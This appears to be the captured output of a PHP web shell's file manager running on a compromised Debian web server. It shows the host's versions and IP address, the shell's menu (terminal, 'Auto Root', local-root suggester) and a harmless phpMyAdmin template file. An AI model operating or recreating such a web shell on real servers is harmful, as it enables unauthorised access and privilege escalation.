Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
phpmyadmin /
templates /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
chart
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
gis_visualization
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
relation
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
search
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
structure
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
index_form.phtml
9.37
KB
-rw-r--r--
2017-01-23 20:20
secondary_tabs.phtml
710
B
-rw-r--r--
2017-01-23 20:20
Save
Rename
<?php $cfgRelation = PMA_getRelationsParam(); ?> <?php if ($cfgRelation['relwork'] || PMA\libraries\Util::isForeignKeySupported($engine)): ?> <ul id="topmenu2"> <?= PMA\libraries\Util::getHtmlTab(array( 'icon' => 'b_props', 'link' => 'tbl_structure.php', 'text' => __('Table structure'), 'id' => 'table_strucuture_id' ), $url_params); ?> <?= PMA\libraries\Util::getHtmlTab(array( 'icon' => 'b_relations', 'link' => 'tbl_relation.php', 'text' => __('Relation view'), 'id' => 'table_relation_id' ), $url_params); ?> </ul> <div class="clearfloat"></div> <?php endif; ?>